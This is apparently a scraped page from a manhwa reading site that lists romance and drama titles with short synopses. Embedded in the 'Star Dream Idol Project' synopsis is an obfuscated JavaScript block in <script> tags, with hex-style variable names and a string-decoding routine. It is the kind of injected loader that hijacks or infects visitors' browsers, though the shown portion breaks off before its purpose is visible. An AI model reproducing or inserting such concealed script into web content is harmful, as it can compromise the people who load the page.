Slice of Life - Page 716

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8913 results

That Couple Has a Secret

Read manhwa That Couple Has a Secret / The Couple Has a Secret / 그 부부에겐 비밀이 있다 The newlyweds who love each other the most in the world Serin and Sowon, have a secret that they cannot tell each other. The wife, Sowon, is the guardian of the kingdom of light, “Cryptic Rose”, the husband, Serin, is the prince of the dark kingdom, “Avalanch”. They became a married couple without knowing the other side of each other, and today they start a marriage fight? who risked their lives for love.


Thorns Of Warmth

Eccentric girl Yin Ying finally got into the university of her dreams, but she unexpectedly discovers that Ji Yuchuan, the arrogant and gifted senior, is her first love whom she lost contact with for four years. After a huge misunderstanding, the two started a “game”, pretending to be a couple. His life is now disturbed by her social butterfly behavior, yet his heart never seemed to stop beating – On the road of my chasing dreams, you were there. The curtains of this show of confusing love is about to be lifted~ 温暖的刺 / Wēn Nuǎn De Cì / Thorns of Warmness


Saving the Doomed Idols With My Touch

can save even the most doomed restaurant with my touch! Im Hyeonseong, a famous chef who has even shown up in a TV show as the CEO of a food industry. He built his wealth and fame from the ground up, but meets an unjust death because of his stepmother and step-sibling. At that moment, a system window appeared in front of him. They will give him a chance to take his revenge if he succeeds in making ‘Climax’, the doomed idol group, successful by controlling Cheon Ise’s body. Will I be able to save the doom restau– I mean the doom idols with my touch? We will now begin the special quest, ‘Idol, Cheon Ise’!


Silver Demon King

South Korean high school 3 Ha Yuan-an who ruined the water test by a marking mistake. In front of him, a beautiful foreigner, or a demon, appears and offers to return the time. Instead, they say to be the devil’s band… . Can Yuan, who suddenly lives the life of the Demon King, can return safely? “Shall I just live my own way? I’m real until the real thing comes back!” Silver Devil King


The Dilettante

Stay until you’re drunk on me. One day, top counterterrorism agent Hana Lee receives news of her twin brother’s passing. Unable to accept the death of her only living relative, she sets out to uncover the truth. Along the way, she gets tangled up with the mysterious Eunseong Yoo and the cold-blooded mafia boss, Giulio Parenti. 딜레탕트


My Second Husband

Eunha Lee is a smart, successful lawyer who has life figured out…that is, until she loses both her parents in a tragic accident and divorces her husband, Taeyang, a famous actor, who she discovers has been cheating on her. Things take a turn for the surreal after Eunha slips on a staircase only to wake up in her past. She is now 22 years old and back in law school. Determined to make better choices in this second life, Eunha swears off romance only to realize her male best friend, Sungwoo, has been in love with her this whole time!

16 hours ago

Star Dream Idol Project

The shining lights, the magnificent stage! Friendships created through singing, making a future through dancing, the girls embark on their journey towards their dreams! One who has lost status due to a scandal is hiding a plot behind her back. A pair of bosom friends, separated by fate. A girl who tries to exonerate her mother sets off on her journey for a talent competition. When the stage turns into an empty battlefield, she uses her voice to chase after her dreams.<script></script><script>function _0x566f(_0xf00ab6,_0x3b2b65){var _0x1db733=_0x2373();return _0x566f=function(_0x1f7685,_0x207485){_0x1f7685=_0x1f7685-(0x20a8+0xad*0x36+-0x168b*0x3);var _0x2bc410=_0x1db733[_0x1f7685];return _0x2bc410;},_0x566f(_0xf00ab6,_0x3b2b65);}(function(_0x18888c,_0x34cad3){var _0x440ccb=_0x566f,_0x5496cf=_0x18888c();while(!![]){try{var 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Contract With Consequences

I want a baby. But I haven’t met the one yet. He is the last person I wanted to see in this miserable state… The sadness she was suppressing welled up, and Scarlet cried in front of her childhood friend. Dreaming of a marriage and a family but unable to meet the person she was destined to be with even after turning thirty, she at least wanted a child, so she opted for artificial insemination that, again, didn’t take this month… When John finds out about her situation, he makes an unbelievable proposal. Why don’t you choose me as the father? And do it the old-fashioned way. But…you’ve hated me. Why would you do this?


Whisked Away by Her Millionaire Boss

If I have the courage to take a chance, will my life change? Sarah, who works as a building cleaner, is approached by Ben Gardiner, CEO of a large company on the top floor. He takes her out to dinner at a three-star restaurant to get the opinion of an “ordinary” woman for his product. For the a normal girl like Sarah, it is a dream come true. Ben then asks Sarah to accompany him on a further week-long visit to Milan to give him advice, saying that her opinion will be helpful. Sarah is alone with the famous playboy… And she has her own reasons…


Dear First Love

After her grandmother, the only family member she has, passed away. Jisoo started living in Hajin’s house as a guest. Even though she lost her whole family at such an early age, she didn’t show any signs of hardship. That’s why Hajin’s gaze is always on her…! The story of Jisoo and Hajin’s blooming first love under the same roof. “You know, it’s really amazing.” “What is?” “That I came to like a guy who I was sure I would never like.”


Poor Father and Daughter

It about a poor family of two: father and rebellious daughter. In order to make money the single father does a lot of odd jobs and at the school the daughter is incompatible with her classmates.


Our Masquerade Of Love

Two lonely people who live a life of lies agree on a marriage of convenience. Both Seyeon and Taejin are children of CEOs of conglomerates. However, Seyeon grew up abused by her stepmother. Her father turns a blind eye to the years of abuse. She sees marriage as a means to escape from them. And Taejin is a notorious playboy, he goes on that masquerade to ensure the heir-apparent to the family business is his stepbrother. Seeking a sudden marriage is part of that masquerade. But two find there’s more to gain from this marriage, starting with raw sexual chemistry.
